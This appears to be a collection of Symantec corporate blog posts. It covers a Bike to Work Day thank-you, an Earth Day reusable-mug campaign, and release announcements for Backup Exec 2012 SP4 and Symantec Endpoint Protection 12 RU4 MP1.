Thanks to all that came out and took part in Bike to Work Day this year, whether biking to work on the 8th, participating in the Company Bike Challenge, or volunteering to make our Energizer Station possible. Many thanks to George Schnurle, Jaya Wadhwani, Jaime Barclay, Ashley Savageau, Spike Burkhardt, Rod Cello, Ben Cota, Russell Hill, Elisa Ewing who volunteered at our Energizer Station and some rode their bikes to work as well.  

We also hope this Bike to Work Day has convinced a few new riders to start a bike commute, and has reminded others why they choose to do it every day.  If we have convinced just a few new people to bike to work more often, we consider this day and month a success!

To join Symantec’s CBC team or for any questions about Bike to Work Day, please contact Environmental Responsibility at Environmental_Responsibility@symantec.com.

Anand Raj Vengadassalam is a Technical Support Engineer and member of the Symantec Mountain View Green Team

Today is Earth Day, a day where people across the world come together to celebrate our planet and the need to protect the valuable resources it provides us.

According to the World Wildlife Fund (WWF), “we currently consume 50 percent more natural resources than the Earth's ecosystems can replenish.” Additionally, if we continue to consume the way we do, by 2030 the resources of two planets will not be enough to support our population.

While it may seem that what you do as an individual makes little difference, the exact opposite is true.

Let’s take your morning coffee cup for example. Did you know that:

• Every minute over one million disposable cups are discarded to landfill.
• In the United States, 16 billion cups were used for coffee as of 2006. This equals about 6.5 million trees.
• Using one disposable cup per day results in 23 lbs of waste per year, just from the cups that are thrown away.
• A reusable coffee mug is designed to be used about 3,000 times in its life, and provides about eight years of use for the average daily coffee drinker. That is compared with approximately 3,000 throw-away cups.
• In 2013, five Symantec sites used approximately 2 million cups.

If one person used a reusable mug everyday this year it would save 87 lbs of CO2. If all Symantec employees used a reusable mug every day for one year it would save 1,883,400 lbs of CO2.

As you can see, some of the most important steps to minimizing our impacts on the planet are a combination of individual acts.

At Symantec, waste management is central to our environmental strategy and we’ve therefore set a goal to reduce paper cup usage by 15 percent, and to achieve 80 percent waste diversion at all of our audited sites.

To do this, we’ve launched the “One Mug, One Planet” campaign to help reduce waste across our operations and encourage all employees to think about the impacts they make both inside and outside the office.

We’re asking all employees to sign the “One Mug, One Planet” pledge– and make a commitment to use a reusable mug every day. Our goal is 2,500 pledges signed across Symantec, and 10 percent of employees at sites that have opted in to join this campaign.

As part of the campaign, employees will take “Mugs Shots,” a picture of themselves, their colleagues, or team with a reusable mug. We’ve also asked employees to use their Mug Shot to encourage colleagues to sign the pledge by sharing via email, posting to Facebook, LinkedIn, and Twitter using the hashtags #1mug1planet #Symantec.

The most creative Mug Shot will win a prize announced at the end of the campaign.

Additionally, we are handing out free reusable mugs for those that sign up to the pledge AND send us a mug shot – so there’s no excuse not to reuse!

The saying “Every day is Earth Day” really is true and if we all follow this, we may be surprised what our collective efforts can achieve. You have to start somewhere, right? Why not start with your coffee cup!  

Symantec employees: Interested in signing your site up to our waste reduction campaign? Or interested in joining the Green Teams? Email Environmental_Responsibility@symantec.com for more information.

Have you snapped a MugShot yet? If not, do so and send to Environmental_Responsibility@symantec.com!

Chris Abess is Symantec's Vice President, Sales Operations, and Global Green Team Executive Champion.

At Symantec, we walked the walk when it came to making our own IT agile. We also learned a lot by boldly embracing some of the cutting edge technologies and developing solutions to fill the gaps. Drew Meyer walks through some of the company's journeys in developing an agile data center.

The Backup Exec 2012 Service Pack 4 (SP4) is now available for download and adds support for Enterprise Vault 10.0.3 and Enterprise Vault 10.0.4.

How to download the service pack

If you are an existing customer and would like to download the latest Backup Exec service pack, please visit: http://www.symantec.com/business/support/index?page=content&id=TECH212772. From there download the EXE at the bottom of the page.
 

Hello Everyone,

Symantec Endpoint Protection 12 RU4 MP1 is released.

This build's version is: 12.1.4100.4126

What's new in this release:

Extended upgrade support

• Unlike most maintenance patch releases, you can upgrade any version of Symantec Endpoint Protection directly to 12.1.4.1. Unsupported downgrade paths still apply.

Expanded operating system support

• The Symantec Endpoint Protection (SEP) client is now supported on Windows To Go (Windows 8.1 Enterprise).
• Symantec Endpoint Protection Manager (SEPM), the SEP client, and the Symantec Network Access Control client are now supported on Windows 8.1 Update 1.
• SEPM, the SEP client, and the Symantec Network Access Control client are now supported on Windows Server 2012 R2 Update 1

Note: If in case you do not see the SEP 12 RU4 MP1 Release on flexnet, you may see the same in coming few days on your Fileconnect Account.

You may find the Latest Release of Symantec Endpoint Protection 12 RU4 MP1 at: https://symantec.flexnetoperations.com/control/symc/registeranonymouslicensetoken

Product Related Articles:

Title: Upgrading or migrating to Symantec Endpoint Protection 12.1.4.1 (RU4 MP1)
Document ID: TECH216176
Article URL: http://www.symantec.com/docs/TECH216176  

Title: New fixes and features in Symantec Endpoint Protection 12.1.4.1 (RU4 MP1)
Document ID: TECH216262
Article URL: http://www.symantec.com/docs/TECH216262

Title: Symantec Endpoint Protection, Symantec Endpoint Protection Small Business Edition, and Symantec Network Access Control 12.1.4.1 Release Notes/What’s New
Document ID: DOC7313
Article URL: http://www.symantec.com/docs/DOC7313

Title: System Requirements for Symantec Endpoint Protection, Enterprise and Small Business Editions, and Network Access Control 12.1.4
Document ID: TECH216260
Article URL: http://www.symantec.com/docs/TECH216260